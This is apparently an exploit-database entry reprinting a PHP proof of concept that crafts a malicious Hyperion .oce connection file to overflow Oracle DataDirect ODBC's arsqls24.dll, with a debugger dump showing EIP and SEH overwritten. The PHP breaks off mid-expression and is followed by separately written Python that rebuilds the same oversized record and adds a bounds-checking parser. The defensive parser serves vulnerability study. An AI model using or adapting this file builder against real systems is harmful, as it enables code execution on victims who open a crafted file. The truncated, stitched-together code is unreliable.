Oracle DataDirect ODBC drivers arsqls24.dll buffer overflow vulnerability

2012-03-19T00:00:00
ID MYHACK58:62201233373
Type myhack58
Reporter Anonymous
Modified 2012-03-19T00:00:00

Description

<?php

/*

Oracle DataDirect ODBC drivers arsqls24.dll buffer overflow vulnerability

Overflow PoC (*.oce)

by rgod

This PoC will create a suntzu.oce file
which should work against Hyperion Interactive Reporting Studio,
which is delivered with the Oracle Hyperion Suite.

When the file is clicked a login box appears; on clicking OK an error message
appears, then another error, then... boom!

description for .oce:
Interactive Reporting database connection file

file association:
"C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\bin\brioqry.exe" "%1"

crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it:

(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:0f48ffff=????????
0:000> g
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=00410041 edx=7c8285f6 esi=00000000 edi=00000000
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00

*/

// Re-encode a little-endian u32 length field, grown by the size of the
// injected host payload so the file still parses with the oversized DSN inside.
function _x($x){
  global $buff;
  list($x) = array_values(unpack("V", $x));
  $x = $x + strlen($buff);
  $x = pack("V",$x);
  return $x;
}

// Host value that overflows: a plausible name, then padding, then 4000 'A's.
$buff = "mydatabase.com".
        str_repeat("\x20",16). //cosmetics, no AAAA... inside the login box
        str_repeat("\x41",4000);

//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=XXXXXXXXX;";

// Pad the DSN to the 166 bytes the length field below (0xa6) expects,
// then splice the host payload into HOST= (the dsn length is grown by _x()).
while (!(strlen($dsn)==166)){ //fill the gap
  $dsn.="\x20";
}

$dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn);

$dump=
"#BRIF\x20BIN001".                  //file magic
"\x00\x00\x00\x00".
_x("\x7b\x07\x00\x00").             //header length, increase counter
"\x37\x00\x00\x00".                 //path length
"D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce".
"\x01\x00\x01\x00".
"\x00\x00\x07\x00".
"\x00\x00\x0a\x00".
"\x00\x00".
_x("\xa6\x00\x00\x00").             //dsn length
$dsn.
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x04\x00\x00\x00".
"True".
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00".
"ColItem.Table".
"\x01\x00".
"\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00".
"ColItem.TableAlias".
"\x01\x00\x00\x00\x10\x00".
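The part of the PoC a defender can act on is the record layout it writes: magic, a zero dword, a header length, a length-prefixed path, fourteen fixed bytes, then a length-prefixed DSN. Every length is a little-endian u32, and rgod's _x() grows the header and DSN lengths by the payload size so the file still parses while the 4030-byte HOST= value rides inside the DSN. The Python below is an added example, not rgod's code and not Oracle's: it builds the same record prefix with the same fixups, then parses it back the way a consumer of the format should, checking each declared length against the bytes actually present before trusting it and bounding the HOST= value at the longest legal DNS name (253). The field layout is read off the PoC's bytes; the fourteen fixed bytes are carried through opaquely because their meaning is not documented here, and the 253 bound is this example's choice.

```python
"""Added example (not rgod's PoC and not Oracle code): build the .oce record prefix
the way the PoC lays it out, then parse it back with bounds checks.  Field layout is
taken from the PoC's bytes; the 14 fixed bytes between the path and the DSN length
are carried through opaquely because their meaning is not documented on the page."""
import struct

MAGIC = b"#BRIF BIN001"
FIXED_FLAGS = b"\x01\x00\x01\x00\x00\x00\x07\x00\x00\x00\x0a\x00\x00\x00"  # copied from the PoC; meaning unknown
HEADER_LEN_BASE = 0x77B   # the PoC's header-length constant before _x() adds the payload size
DSN_PAD_LEN = 166         # the PoC pads the DSN template to this length before splicing HOST=
MAX_HOSTNAME = 253        # longest legal DNS name; a HOST= value beyond this is not a hostname (our bound)


def fixup(base, payload_len):
    """Port of the PoC's _x(): a little-endian u32 length grown by the injected payload size."""
    return struct.pack("<I", base + payload_len)


def build_oce_prefix(path, dsn_template, host):
    """Magic, zero dword, header length, path length + path, fixed bytes, DSN length + DSN."""
    dsn = dsn_template.ljust(DSN_PAD_LEN).replace("HOST=;", "HOST=" + host + ";")
    path_b = path.encode("latin-1")
    dsn_b = dsn.encode("latin-1")
    return (MAGIC
            + b"\x00\x00\x00\x00"
            + fixup(HEADER_LEN_BASE, len(host))
            + struct.pack("<I", len(path_b)) + path_b
            + FIXED_FLAGS
            + struct.pack("<I", len(dsn_b)) + dsn_b)


def parse_oce_prefix(blob):
    """Parse the prefix defensively: no declared length is trusted until it has been
    checked against the bytes actually present, and the HOST= value is bounded."""
    if not blob.startswith(MAGIC):
        return {"findings": ["bad magic"]}

    def u32(at, what):
        if at + 4 > len(blob):
            raise ValueError("%s field at offset %d runs past end of file" % (what, at))
        return struct.unpack_from("<I", blob, at)[0]

    def counted(at, what):
        # u32 length prefix followed by that many bytes; fail closed on any overrun
        n = u32(at, what + " length")
        if at + 4 + n > len(blob):
            raise ValueError("%s length %d overruns file (%d bytes left)" % (what, n, len(blob) - at - 4))
        return blob[at + 4:at + 4 + n], at + 4 + n

    pos = len(MAGIC) + 4                      # skip magic and the zero dword
    try:
        header_len = u32(pos, "header length")
        path_b, pos = counted(pos + 4, "path")
        dsn_b, pos = counted(pos + len(FIXED_FLAGS), "dsn")
    except ValueError as e:
        return {"findings": [str(e)]}

    host = b""
    for kv in dsn_b.split(b";"):
        if kv.startswith(b"HOST="):
            host = kv[len(b"HOST="):]
    findings = []
    if len(host) > MAX_HOSTNAME:
        findings.append("HOST= value is %d bytes, longer than any legal hostname (%d)"
                        % (len(host), MAX_HOSTNAME))
    return {"header_len": header_len, "path": path_b.decode("latin-1"),
            "dsn_len": len(dsn_b), "host": host.decode("latin-1"), "findings": findings}


if __name__ == "__main__":
    # Constructed input shaped like the PoC's: the DSN template and host payload it uses.
    dsn = "DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=XXXXXXXXX;"
    poc_host = "mydatabase.com" + " " * 16 + "A" * 4000
    blob = build_oce_prefix(r"D:\Documents and Settings\Admin\Desktop\Predefinito.oce", dsn, poc_host)
    for line in parse_oce_prefix(blob)["findings"]:
        print(line)
```

Run stand-alone it reports the oversized HOST= value for a PoC-shaped record; fed a benign connection file the findings list is empty, and a file cut short is rejected at the first length field that overruns it rather than read past the end.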
